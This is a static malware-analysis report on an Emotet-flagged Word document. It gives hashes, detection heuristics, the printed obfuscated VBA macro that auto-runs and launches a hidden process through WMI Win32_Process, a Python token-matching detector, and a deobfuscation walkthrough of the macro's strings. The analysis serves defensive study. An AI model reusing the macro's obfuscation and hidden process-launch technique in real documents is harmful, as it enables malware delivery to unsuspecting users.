Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 397485a2bb27c1af…

MALICIOUS

Office (OLE)

Size: 253.8 KB | Created: 2020-01-17 19:21:00 | Authoring application: Microsoft Office Word | First seen: 2021-02-18
MD5: 241dde86779c311d757e644825fa2c59 | SHA-1: 42502dd34d32b3a79950bae490dbc7bb207539a4 | SHA-256: 397485a2bb27c1afd95ff7c8b962c7ebfe4983db30d1e65b71c0529cdddb2f08
Risk score: 172

Heuristics (7)

  • ClamAV: Doc.Dropper.Emotet-7546199-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Emotet-7546199-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject called with a moniker string that is assembled at runtime. Binding an object by moniker lets a macro reach COM or WMI objects (the winmgmts: namespace, for example) without the target's name ever appearing in clear text in the source.
    Matched line in script
    Set Huuoserwq = GetObject(Dnlbrvlmi)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers only on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell, download or object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; the pairing is what flags documents whose macros survive only as p-code, or whose source could not be extracted, so that the VBA source itself is unavailable for review. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open runs automatically when the document is opened (once macros are enabled), so it is the auto-execution entry point. Here it does nothing but call Nqoahvljqksr, the function that performs the actual work.
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard Office Open XML DrawingML namespace identifier found in any document that carries drawing objects; it is not a host the macro contacts and should not be treated as an indicator.
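The co-occurrence rule behind OLE_VBA_PCODE_AUTOEXEC_EXEC, written out as an added example (Python; this is not code from the report or from the analysis tool, and the sample streams below are constructed, not taken from the analysed document). The token lists are the ones the heuristic description names; the check is a whole-word, case-insensitive search so that `Document_open` counts but `PowerShell` does not satisfy the `Shell` token, and a stream fires only when both classes are present in it:

```python
import re

# Token classes named by the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic above.
AUTOEXEC = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
            "Auto_Close", "AutoClose")
EXEC = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
        "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
        "ShellExecute", "ExecuteExcel4Macro")


def _hits(text, tokens):
    """Return the tokens present in text as whole words, case-insensitively.
    The boundary check means 'PowerShell' does not satisfy the 'Shell' token,
    while 'WScript.Shell' does (a '.' is not a word character)."""
    return [t for t in tokens
            if re.search(r"(?<!\w)" + re.escape(t) + r"(?!\w)", text, re.I)]


def pcode_autoexec_exec(streams):
    """streams maps a stream name to its content: decoded VBA source (str), or
    the raw compiled/cache stream (bytes) when source extraction failed.
    A finding (name, autoexec_tokens, exec_tokens) is emitted only for a stream
    holding BOTH an auto-exec entry point and an execution token; either class
    alone never fires, which is the point of the heuristic."""
    findings = []
    for name, data in streams.items():
        text = data.decode("latin-1") if isinstance(data, bytes) else data
        auto, execs = _hits(text, AUTOEXEC), _hits(text, EXEC)
        if auto and execs:
            findings.append((name, auto, execs))
    return findings


# Constructed sample streams (not from the analysed document):
SAMPLE_STREAMS = {
    # auto-exec and execution token in one module -> fires
    "VBA/Module1": 'Sub AutoOpen()\n  Set o = CreateObject("WScript.Shell")\n'
                   '  o.Run "cmd.exe /c whoami"\nEnd Sub\n',
    # auto-exec only -> silent
    "VBA/ThisDocument": 'Private Sub Document_Open()\n  MsgBox "hi"\nEnd Sub\n',
    # execution token only -> silent
    "VBA/Helpers": "Function Launch(p)\n  Launch = Shell(p, 1)\nEnd Function\n",
    # raw cache stream with no recoverable source; the names still sit in plain bytes
    "VBA/__SRP_2": b"\x00\x01Document_Open\x00\x00GetObject\x00\xff",
}

if __name__ == "__main__":
    for name, auto, execs in pcode_autoexec_exec(SAMPLE_STREAMS):
        print(f"{name}: autoexec={auto} exec={execs}")
```

Run against the constructed streams, only `VBA/Module1` and the raw `VBA/__SRP_2` stream produce findings; the module with just `Document_Open` and the helper with just `Shell` stay silent, which is the false-positive behaviour the description promises.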

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8180 bytes
SHA-256: d7b0dff802b87609ec75ab459632a24fc9837b0e96d838b71142518eaa405eda
Detection
ClamAV: No threats found
Obfuscation or payload: likely
208 of 303 identifiers look randomly generated (e.g. 'Ssijygmqobgfk'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Brksqxht"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Nqoahvljqksr
End Sub

Attribute VB_Name = "Rontevfyd"
Attribute VB_Base = "0{639D43C7-5467-44F5-92CD-39FE69D9E6E8}{D367A484-EAC5-4C14-8826-4AAC7B1C0491}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Xdhtssoxjxl"
Function Vyzdaskogf()
   Select Case Mwjmkbevpi
      Case Ukoaldyenyei
         Qilemlfmwkq = 7
         Fnjisdtohts = Atn(4)
         Qpworarvlvj = Sin(Tohnekymtqepm)
      Case Aiospyvq
         Tpvvtrzyv = Log(3)
         Gupirbwzr = 6
         Vpudgrvyy = CSng(Fkucrzyfrqww)
      Case Zjxwyqyjoug
         Kicxkgooeop = ChrW(Amhoysaphhycz)
         Wwavqjnxoslp = 1
         Uvhlbqlbzvnza = Cos(Evlzusio)
End Select
Jfxcszci = ChrW(wdKeyP)
   Select Case Yhbxcpjbe
      Case Vzwapklge
         Mrnprghk = 7
         Aekczgajz = Atn(4)
         Koaxpyexk = Sin(Nxvjkmxdu)
      Case Zvulyqdlxei
         Dmscicnb = Log(3)
         Qmgqwnlwsmvo = 6
         Dzouyodf = CSng(Fxtuurgogdez)
      Case Gyliqhgp
         Ziosceoljol = ChrW(Qbaghhaxeion)
         Upvmppdv = 1
         Olcotpdp = Cos(Uhpbzihsv)
End Select
Fulnjdguw = Jfxcszci + Rontevfyd.Inrjxrsimz + Rontevfyd.Xjxslbcw
   Select Case Fhgiuhkj
      Case Xurckcjnbh
         Wjfqxaqze = 7
         Rurzjmoigjph = Atn(4)
         Rxktdggrzl = Sin(Ekksehrc)
      Case Tczanyfwh
         Fgcgfazlz = Log(3)
         Dgidyoehp = 6
         Jehudtilde = CSng(Ydhlyhsrbmnzs)
      Case Zrrznivwyy
         Fcnrbiijarcgz = ChrW(Jwribkkju)
         Gpdgjmnkm = 1
         Vlqkiihplzq = Cos(Ahqjmvstfx)
End Select
losd = Rontevfyd.Chphtxkp.GroupName
Wxbspagjl = Split(Fulnjdguw + LTrim(losd), "//====dsfnnJJJsm388//=")
   Select Case Hayloxff
      Case Blncsfctnrpm
         Rkhoivyddoff = 7
         Dvovaxcol = Atn(4)
         Agbvkkuret = Sin(Qxpwyiyxnkx)
      Case Cummrdzxfiow
         Ekoqlafyxkae = Log(3)
         Mvpildhpif = 6
         Dskpazrpumy = CSng(Pmexblnxmk)
      Case Gldlobjcvwmn
         Amqszxuvvq = ChrW(Gtasqhawuone)
         Psrtarprka = 1
         Kmykpmiwvpcc = Cos(Mlpmylmph)
End Select
Vyzdaskogf = Clhtrwrlxlfqs + Join(Wxbspagjl, "") + Clhtrwrlxlfqs
   Select Case Gpwkdfewxj
      Case Apstwebuholbb
         Nqoztljakqz = 7
         Kemsoofkxp = Atn(4)
         Vjerevjlqr = Sin(Kwmqoidxj)
      Case Dcsnnnfpbs
         Bfifuqjttzdir = Log(3)
         Volzzdyaplh = 6
         Lbeqtykkgdiga = CSng(Dykvlyjaptqu)
      Case Ttnulirvn
         Qepldszfgxqb = ChrW(Zbaoxcdhfm)
         Lopailvcuttp = 1
         Rpwhcsbk = Cos(Qgqmpjzcc)
End Select
End Function
Function Nqoahvljqksr()
d = "//====dsfnnJJJsm388//=i//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=n//====dsfnnJJJsm388//=m//====dsfnnJJJsm388//=gmt//====dsfnnJJJsm388//=" + ChrW(wdKeyS) + "//====dsfnnJJJsm388//=:w//====dsfnnJJJsm388//=in//====dsfnnJJJsm388//=32//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=_//====dsfnnJJJsm388//=" + Rontevfyd.Tghnzxczsfi + "//====dsfnnJJJsm388//=ro//====dsfnnJJJsm388//=ce//====dsfnnJJJsm388//=ss"
   Select Case Zbroyruhnrws
      Case Ffqxmfxfi
         Ozrnhnir = 7
         Xgofwzwzmfmy = Atn(4)
         Slkagutsgnksc = Sin(Doaeqhzcr)
      Case Afwenqyru
         Ilxxfzav = Log(3)
         Dtjrmujrtitka = 6
         Wcattlzjafp = CSng(Czbwljxmnmbw)
      Case Bnjxkdjjxabkl
         Jmwnqpthwz = ChrW(Bipzxelxvqied)
         Bbuaxtdeaeiy = 1
         Gmytgiaib = Cos(Zgoseskhw)
End Select
E = "//====dsfnnJJJsm388//="
   Select Case Vzvqvcek
      Case Ruyxenbccw
         Kskwkwvqgz = 7
         Gvutxpfgdd = Atn(4)
         Tmfeouwxdloc = Sin(Rhpvdsjoqisie)
      Case Shhlqcyrqblc
         Vgsnyyxri = Log(3)
         Kfvwmgqkgkd = 6
         Ovsqytrpvhu = CSng(Ufotbzgx)
      Case Cueuvshwszcyd
         Soiyoxbul = ChrW(Vmjeathxpw)
         Wxnlccywcimil = 1
         Sabzsikwvmoyi = Cos(Plxombblz)
End Select
Wfitycfl = Split("//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=w//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=" + d + T, E)
   Select Case Kvgdqtghrpvuy
      Case Czpyxzskmxt
         Gvcnaxfdsfvvr = 7
         Bbttelbqbor = Atn(4)
         Ktfxqjbwmiua = Sin(Juucgibjld)
      Case Mefbziyntyzxf
         Votzsfysvhl = Log(3)
         Raicyqwwqlj = 6
         Ltluwwyt = CSng(Sehunmjtnxiw)
      Case Xzplseckoqt
         Akpmwlepx = ChrW(Ijhsvnupbvxxh)
         Bsiqqajf = 1
         Yllknazis = Cos(Wkoawddldn)
End Select
Dnlbrvlmi = Join(Wfitycfl, "")
   Select Case Hypdzvxwjwy
      Case Cziwemkh
         Fozsbhuywkay = 7
         Fttjukgmx = Atn(4)
         Ryobvsjo = Sin(Pacvopyctz)
      Case Erlsanho
         Uojjgwarrjv = Log(3)
         Tqnfvikefzr = 6
         Qcsvgprygomfj = CSng(Biuejarc)
      Case Mghmooroj
         Zvcgcrncbamfi = ChrW(Enlvzaeouikmr)
         Raxdbnsxgjez = 1
         Aaykrjedn = Cos(Vhixsfvdgjlhe)
End Select
Set Huuoserwq = GetObject(Dnlbrvlmi)
   Select Case Piodpdvq
      Case Ygrzrptjapkbw
         Minpxffki = 7
         Yeplwcovdiuhs = Atn(4)
         Mjrpnmzxcu = Sin(Hqtwidvr)
      Case Psinalwrbuak
         Ssijygmqobgfk = Log(3)
         Dwwxstyham = 6
         Lsnzwxxd = CSng(Msihyeggvbkf)
      Case Dnabukhwkfbya
         Hmjvikeplv = ChrW(Urmrfuqv)
         Vjfnqidfaedwn = 1
         Jqnzxoga = Cos(Fxnwekgakrz)
End Select
Umhwjcyvyq = Rontevfyd.Matygofb.Tag
Bmcwdtqg = Dnlbrvlmi + ChrW(wdKeyS) + Rontevfyd.Olocpxenwtr.Tag + Umhwjcyvyq
   Select Case Cwlkjlri
      Case Mhbujzbltp
         Qjoayiysyto = 7
         Uijzzfobhotzg = Atn(4)
         Fxxkoogc = Sin(Nikdnssaup)
      Case Lujymiuuardv
         Wenlognp = Log(3)
         Dyuwbzmqmnlca = 6
         Xhbjvfpq = CSng(Onjakewinuooy)
      Case Fnizptdx
         Ymgqroihamm = ChrW(Bjpunvnijii)
         Gqxdlqzjmrqs = 1
         Ghygocxhq = Cos(Pbvipexzairjw)
End Select
Spjksgmeepscf = Bmcwdtqg + Rontevfyd.Tghnzxczsfi
   Select Case Dpstloipowlib
      Case Mzwtqzsvetgcv
         Ronedkmy = 7
         Zidwrcurqphd = Atn(4)
         Alunzemnknf = Sin(Wgoaaeaqqpyn)
      Case Keptnkxdsp
         Ngmxpruhxkbog = Log(3)
         Zkvvaisb = 6
         Trmxsnzbbqtet = CSng(Tjozcanog)
      Case Wtyqvedbwahk
         Cneijvqwogydb = ChrW(Gcgyzqfdkvpa)
         Hmzjczni = 1
         Ddafssscxgpxa = Cos(Fxkunuuzt)
End Select
Set Nqoahvljqksr = GetObject(Spjksgmeepscf)
   Select Case Wkvyuhfdmgt
      Case Abpjjcosgtj
         Fvmegzhajmnl = 7
         Xbxznxcjzxou = Atn(4)
         Vpqlwdcjrizti = Sin(Pcxohqqjtveo)
      Case Opmtkftvbprrn
         Atpnrjuqfyg = Log(3)
         Wqsogmcsn = 6
         Kxtbixpcgttbo = CSng(Muzgvean)
      Case Xdlahxntrc
         Siiidyndodm = ChrW(Itgetkkv)
         Tebzvgixyk = 1
         Qymabzvx = Cos(Iazegoxsjuc)
End Select
Nqoahvljqksr. _
showwindow = False
   Select Case Caecgqbw
      Case Dipmyaxcibejv
         Mszoidvshekdy = 7
         Vqilmrqxah = Atn(4)
         Uayseefu = Sin(Hosipihn)
      Case Kzgnajnfvvzgk
         Sjmgztxl = Log(3)
         Utebiqmkzs = 6
         Ksuqzzccbdrh = CSng(Vhyfmnmegqjdm)
      Case Wlhgyytliu
         Rhqbwejufm = ChrW(Hhglehvmx)
         Sjbybbwpl = 1
         Uwpomzdkh = Cos(Bzrrigbzllc)
End Select
Do While Huuoserwq. _
Create(pok & Vyzdaskogf, Kzxvdlfbqf, Nqoahvljqksr, Ddhmufor)
Loop
   Select Case Fcchzhiauxnvm
      Case Xqfektnjrhwc
         Blzcknwvtub = 7
         Oxbihgjpgec = Atn(4)
         Sskzcfiks = Sin(Scjxbxkdwey)
      Case Zpvqzvhwtev
         Trvfevlnqe = Log(3)
         Ojtzmatgua = 6
         Slxeszxotr = CSng(Hracacjlyelm)
      Case Hdbxqtemmtyhu
         Itwfzrvaq = ChrW(Rcloalpvrtmv)
         Ovegetisep = 1
         Gofmdksxcca = Cos(Mrzzmwxvwlwq)
End Select
End Function
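The string assembly in Nqoahvljqksr above, worked through as an added example (Python; this is not code from the report, from oletools, or from the sample). Every string literal in the module is padded with the junk delimiter held in E, and `Split(..., E)` followed by `Join(..., "")` simply strips it again, so the evaluator below only needs to concatenate literals, resolve `ChrW(wdKey*)` through Word's WdKey enumeration (whose values are the ASCII codes of the key's letter, so wdKeyS is 83, "S", and wdKeyP is 80, "P"), and remove the delimiter. The module never assigns T, so it evaluates to Empty and contributes nothing. The `Rontevfyd.*` properties are UserForm control values that macros.bas does not contain; they are kept as `{placeholder}` text so the output shows exactly which characters are still missing rather than silently dropping them. The `form` argument is an assumption of this example: it stands for values an analyst would supply after extracting the form stream separately.

```python
import re

# Delimiter E and the wdKey constants used by the extracted macros.bas above.
DELIM = "//====dsfnnJJJsm388//="
WDKEY = {"wdKeyS": 83, "wdKeyP": 80}   # WdKey = ASCII code of the key's letter

# Right-hand sides of `d = ...`, `Wfitycfl = Split(..., E)` and, with Umhwjcyvyq
# inlined, `Spjksgmeepscf = Bmcwdtqg + Rontevfyd.Tghnzxczsfi`, copied from the
# module with the repeated delimiter written as {D} for readability.
D = DELIM
D_EXPR = (f'"{D}i{D}{D}n{D}m{D}gmt{D}" + ChrW(wdKeyS) + "{D}:w{D}in{D}32{D}{D}_{D}"'
          f' + Rontevfyd.Tghnzxczsfi + "{D}ro{D}ce{D}ss"')
WFITYCFL_EXPR = f'"{D}{D}w{D}{D}" + d + T'
STARTUP_EXPR = ("Dnlbrvlmi + ChrW(wdKeyS) + Rontevfyd.Olocpxenwtr.Tag"
                " + Rontevfyd.Matygofb.Tag + Rontevfyd.Tghnzxczsfi")

# A VBA concatenation here is only string literals, ChrW(wdKey*) calls and names.
TOKEN = re.compile(r'"([^"]*)"|ChrW\((\w+)\)|([A-Za-z_][\w.]*)')


def eval_concat(expr, env):
    """Evaluate a VBA string concatenation. Names resolve through env; names
    that are not in env become {name} placeholders so unresolved pieces (the
    UserForm properties) stay visible in the result instead of vanishing."""
    out = []
    for lit, key, name in TOKEN.findall(expr):
        if key:
            out.append(chr(WDKEY[key]))
        elif name:
            out.append(env.get(name, "{" + name + "}"))
        else:
            out.append(lit)
    return "".join(out)


def split_join(s, delim):
    """Split(s, delim) followed by Join(parts, "") is plain delimiter removal."""
    return "".join(s.split(delim))


def recover_monikers(form=None):
    """Return (Dnlbrvlmi, Spjksgmeepscf), the two strings the macro hands to
    GetObject. `form` (hypothetical input) maps Rontevfyd.* properties to
    values recovered from the UserForm stream; without it the placeholders
    show what the extracted module alone cannot supply."""
    env = {"T": ""}            # T is never assigned in the module: Empty -> ""
    env.update(form or {})
    env["d"] = eval_concat(D_EXPR, env)
    env["Dnlbrvlmi"] = split_join(eval_concat(WFITYCFL_EXPR, env), DELIM)
    return env["Dnlbrvlmi"], eval_concat(STARTUP_EXPR, env)


if __name__ == "__main__":
    for label, value in zip(("Dnlbrvlmi", "Spjksgmeepscf"), recover_monikers()):
        print(f"{label} = {value}")
```

With no form values the first moniker comes back as `winmgmtS:win32_{Rontevfyd.Tghnzxczsfi}rocess`: a WMI moniker with a single character supplied by the form (moniker prefixes are resolved case-insensitively, so the capital S from ChrW(wdKeyS) is not a mistake). The second string appends S, two form Tag values and the same form property again, and is the object whose `showwindow` is set to False before the `Create` loop. The command line passed to `Create` is built the same way in Vyzdaskogf, starting from ChrW(wdKeyP) plus form properties and the GroupName of a form control, so the form stream has to be extracted before the launched command can be recovered; the decoded module on its own does not contain it.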